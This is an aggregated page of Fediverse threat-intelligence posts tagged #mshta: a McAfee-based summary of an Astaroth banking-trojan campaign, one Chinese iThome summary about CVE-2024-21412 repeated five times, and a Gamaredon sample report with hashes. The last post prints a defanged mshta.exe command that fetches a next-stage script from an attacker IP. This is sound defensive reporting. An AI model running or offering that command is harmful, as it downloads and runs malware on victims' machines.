home.social

#mshta — Public Fediverse posts

Live and recent posts from across the Fediverse tagged #mshta, aggregated by home.social.

  1. 🎯 Threat Intelligence
    ===================

    Executive summary: McAfee Labs uncovered a recent Astaroth banking‑trojan campaign that abuses GitHub repositories as resilient backup infrastructure. The operators start with phishing that delivers a .lnk shortcut which invokes obfuscated JavaScript via mshta.exe, leading to AutoIT artifacts and an encrypted Astaroth payload.

    Technical details:
    • The initial downloader is packaged as a ZIP containing a Windows shortcut (.lnk) which executes JavaScript through mshta.exe.
    • The downloader retrieves files into ProgramData, including an AutoIT compiled script Corsair.Yoga.06342.8476.366.log, an AutoIT interpreter Corsair.Yoga.06342.8476.366.exe, and an encrypted payload stack.tmp identified as Astaroth.
    • C2 communication is achieved via a reverse proxy using Ngrok for exfiltration of credentials and session data.
    • When primary C2 servers are inaccessible, the malware fetches updated configuration data embedded via steganography within images hosted on GitHub repositories.
    • Links used by the campaign are geo‑restricted to target specific countries (major focus on Brazil and broader South American targets, with some activity in Portugal and Italy).

    Attack Chain Analysis:
    • Initial Access: Phishing email with ZIP attachment and .lnk shortcut.
    • Download: Obfuscated JavaScript fetched and executed via mshta.exe; artifacts written to ProgramData.
    • Execution: AutoIT interpreter runs compiled AutoIT script, which launches the encrypted payload.
    • Persistence/Config Fetch: Malware uses GitHub‑hosted images carrying steganographic configurations as fallback C2.
    • Exfiltration: Credentials and harvested data sent through Ngrok tunnels.

    Detection guidance:
    • Look for execution of mshta.exe originating from .lnk shortcuts and unusual AutoIT binary activity under ProgramData.
    • Monitor outbound connections to ngrok.io domains and anomalous HTTP(S) fetches of image resources from GitHub repositories, especially requests with geo‑restriction behavior.

    Limitations and context:
    • IoCs published by McAfee included file names and behavioral details; repositories mentioned were reported to GitHub and removed. Specific IPs or hashes were not fully listed in the summarized text.

    🔹 Astaroth #GitHub #Ngrok #AutoIt #mshta

    🔗 Source: mcafee.com/blogs/other-blogs/m

  2. 網路捷徑檔案安全機制繞過漏洞遭到利用超過一年,攻擊者用於散布數種竊資軟體 | iThome

    Link
    📌 Summary:
    微軟在今年2月例行更新中修補了網路捷徑檔案安全繞過漏洞CVE-2024-21412,但駭客卻利用這項漏洞來散布多種竊資軟體,攻擊範圍涵蓋北美、西班牙和泰國。資安業者Fortinet在分析中發現,攻擊者製作指向特定遠端伺服器的惡意URL檔案,並在受害電腦下載LNK檔案,誘使受害者執行該檔案,從而推進攻擊。研究人員看到駭客使用兩種不同程式碼注入工具來繞過防禦,最終在受害電腦植入竊資軟體。

    🎯 Key Points:
    1. 微軟在今年2月修補了網路捷徑檔案安全繞過漏洞CVE-2024-21412,但駭客利用它散布竊資軟體。
    2. 資安業者Fortinet發現,攻擊者製作指向特定遠端伺服器的惡意URL檔案,並誘使受害者執行以推進攻擊。
    3. 研究人員看到駭客使用兩種程式碼注入工具,最終在受害電腦植入竊資軟體。
    4. Fortinet發現,駭客利用Steam社群網站作為Dead Drop Resolver來埋藏C2來源。

    🔖 Keywords:
    #CVE-2024-21412
    #Fortinet
    #Water Hydra
    #Lumma Stealer
    #Meduza Stealer
    #ACR Stealer
    #PowerShell
    #HTA指令碼
    #Edge主程式圖示
    #LNK檔案
    #forfiles
    #mshta
    #Imghippo
    #GdipBitmapGetPixel
    #HijackLoader
    #Steam社群網站
    #Dead Drop Resolver
    #Docker
    #AuthZ
    #OpenAI
    #GPT-4o mini
    #Meta Llama 3

  3. 網路捷徑檔案安全機制繞過漏洞遭到利用超過一年,攻擊者用於散布數種竊資軟體 | iThome

    Link
    📌 Summary:
    微軟在今年2月例行更新中修補了網路捷徑檔案安全繞過漏洞CVE-2024-21412,但駭客卻利用這項漏洞來散布多種竊資軟體,攻擊範圍涵蓋北美、西班牙和泰國。資安業者Fortinet在分析中發現,攻擊者製作指向特定遠端伺服器的惡意URL檔案,並在受害電腦下載LNK檔案,誘使受害者執行該檔案,從而推進攻擊。研究人員看到駭客使用兩種不同程式碼注入工具來繞過防禦,最終在受害電腦植入竊資軟體。

    🎯 Key Points:
    1. 微軟在今年2月修補了網路捷徑檔案安全繞過漏洞CVE-2024-21412,但駭客利用它散布竊資軟體。
    2. 資安業者Fortinet發現,攻擊者製作指向特定遠端伺服器的惡意URL檔案,並誘使受害者執行以推進攻擊。
    3. 研究人員看到駭客使用兩種程式碼注入工具,最終在受害電腦植入竊資軟體。
    4. Fortinet發現,駭客利用Steam社群網站作為Dead Drop Resolver來埋藏C2來源。

    🔖 Keywords:
    #CVE-2024-21412
    #Fortinet
    #Water Hydra
    #Lumma Stealer
    #Meduza Stealer
    #ACR Stealer
    #PowerShell
    #HTA指令碼
    #Edge主程式圖示
    #LNK檔案
    #forfiles
    #mshta
    #Imghippo
    #GdipBitmapGetPixel
    #HijackLoader
    #Steam社群網站
    #Dead Drop Resolver
    #Docker
    #AuthZ
    #OpenAI
    #GPT-4o mini
    #Meta Llama 3

  4. 網路捷徑檔案安全機制繞過漏洞遭到利用超過一年,攻擊者用於散布數種竊資軟體 | iThome

    Link
    📌 Summary:
    微軟在今年2月例行更新中修補了網路捷徑檔案安全繞過漏洞CVE-2024-21412,但駭客卻利用這項漏洞來散布多種竊資軟體,攻擊範圍涵蓋北美、西班牙和泰國。資安業者Fortinet在分析中發現,攻擊者製作指向特定遠端伺服器的惡意URL檔案,並在受害電腦下載LNK檔案,誘使受害者執行該檔案,從而推進攻擊。研究人員看到駭客使用兩種不同程式碼注入工具來繞過防禦,最終在受害電腦植入竊資軟體。

    🎯 Key Points:
    1. 微軟在今年2月修補了網路捷徑檔案安全繞過漏洞CVE-2024-21412,但駭客利用它散布竊資軟體。
    2. 資安業者Fortinet發現,攻擊者製作指向特定遠端伺服器的惡意URL檔案,並誘使受害者執行以推進攻擊。
    3. 研究人員看到駭客使用兩種程式碼注入工具,最終在受害電腦植入竊資軟體。
    4. Fortinet發現,駭客利用Steam社群網站作為Dead Drop Resolver來埋藏C2來源。

    🔖 Keywords:
    #CVE-2024-21412
    #Fortinet
    #Water Hydra
    #Lumma Stealer
    #Meduza Stealer
    #ACR Stealer
    #PowerShell
    #HTA指令碼
    #Edge主程式圖示
    #LNK檔案
    #forfiles
    #mshta
    #Imghippo
    #GdipBitmapGetPixel
    #HijackLoader
    #Steam社群網站
    #Dead Drop Resolver
    #Docker
    #AuthZ
    #OpenAI
    #GPT-4o mini
    #Meta Llama 3

  5. 網路捷徑檔案安全機制繞過漏洞遭到利用超過一年,攻擊者用於散布數種竊資軟體 | iThome

    Link
    📌 Summary:
    微軟在今年2月例行更新中修補了網路捷徑檔案安全繞過漏洞CVE-2024-21412,但駭客卻利用這項漏洞來散布多種竊資軟體,攻擊範圍涵蓋北美、西班牙和泰國。資安業者Fortinet在分析中發現,攻擊者製作指向特定遠端伺服器的惡意URL檔案,並在受害電腦下載LNK檔案,誘使受害者執行該檔案,從而推進攻擊。研究人員看到駭客使用兩種不同程式碼注入工具來繞過防禦,最終在受害電腦植入竊資軟體。

    🎯 Key Points:
    1. 微軟在今年2月修補了網路捷徑檔案安全繞過漏洞CVE-2024-21412,但駭客利用它散布竊資軟體。
    2. 資安業者Fortinet發現,攻擊者製作指向特定遠端伺服器的惡意URL檔案,並誘使受害者執行以推進攻擊。
    3. 研究人員看到駭客使用兩種程式碼注入工具,最終在受害電腦植入竊資軟體。
    4. Fortinet發現,駭客利用Steam社群網站作為Dead Drop Resolver來埋藏C2來源。

    🔖 Keywords:
    #CVE-2024-21412
    #Fortinet
    #Water Hydra
    #Lumma Stealer
    #Meduza Stealer
    #ACR Stealer
    #PowerShell
    #HTA指令碼
    #Edge主程式圖示
    #LNK檔案
    #forfiles
    #mshta
    #Imghippo
    #GdipBitmapGetPixel
    #HijackLoader
    #Steam社群網站
    #Dead Drop Resolver
    #Docker
    #AuthZ
    #OpenAI
    #GPT-4o mini
    #Meta Llama 3

  6. 網路捷徑檔案安全機制繞過漏洞遭到利用超過一年,攻擊者用於散布數種竊資軟體 | iThome

    Link
    📌 Summary:
    微軟在今年2月例行更新中修補了網路捷徑檔案安全繞過漏洞CVE-2024-21412,但駭客卻利用這項漏洞來散布多種竊資軟體,攻擊範圍涵蓋北美、西班牙和泰國。資安業者Fortinet在分析中發現,攻擊者製作指向特定遠端伺服器的惡意URL檔案,並在受害電腦下載LNK檔案,誘使受害者執行該檔案,從而推進攻擊。研究人員看到駭客使用兩種不同程式碼注入工具來繞過防禦,最終在受害電腦植入竊資軟體。

    🎯 Key Points:
    1. 微軟在今年2月修補了網路捷徑檔案安全繞過漏洞CVE-2024-21412,但駭客利用它散布竊資軟體。
    2. 資安業者Fortinet發現,攻擊者製作指向特定遠端伺服器的惡意URL檔案,並誘使受害者執行以推進攻擊。
    3. 研究人員看到駭客使用兩種程式碼注入工具,最終在受害電腦植入竊資軟體。
    4. Fortinet發現,駭客利用Steam社群網站作為Dead Drop Resolver來埋藏C2來源。

    🔖 Keywords:
    #CVE-2024-21412
    #Fortinet
    #Water Hydra
    #Lumma Stealer
    #Meduza Stealer
    #ACR Stealer
    #PowerShell
    #HTA指令碼
    #Edge主程式圖示
    #LNK檔案
    #forfiles
    #mshta
    #Imghippo
    #GdipBitmapGetPixel
    #HijackLoader
    #Steam社群網站
    #Dead Drop Resolver
    #Docker
    #AuthZ
    #OpenAI
    #GPT-4o mini
    #Meta Llama 3

  7. A very fresh #Gamaredon TA sample from today (Jan 23, 2022) targeting the Directorate General For Rendering Services To Diplomatic Missions of #Ukraine:

    Original email: afb612d08112c036628a29ed8d4bd4550ca7cfed2582e2f432f2283a9b507f15

    Attachment:
    d124919de870b5974639ba24dd80709ed890119bdec4ba6a6179464fca4ef952 *Запит.tar

    Extracted malicious LNK:
    600ef7861ad03b434d98312a4133dc33fa1944f43c2e558044dfcdb342803147 *Відповідно_до_статті_20_Закону,_просимо_надати_відповідь_протягом_5_робочих_днів_з_дня_отримання_запиту.lnk
    dropping a next stage #vbscript via #mshta

    %windir%\system32\mshta[.]exe http://194.180.174[.]203/23.01/mo/baseball[.]DjVu

    284bd873c840415ee24738f0a866b558d51f5f58b6bf29fb2818ffb819f9bd04 *baseball.DjVu

    Once deobfuscated it leads to a #Telegram channel providing with the next state IP:
    b7422446c22baee16c6c9c00a82610f739b836648ffce070bbd6c932db5416f5 *baseball.DjVu.deobfuscated

    We have a full paper of this Telegram multi-staging technique published last week here: blogs.blackberry.com/en/2023/0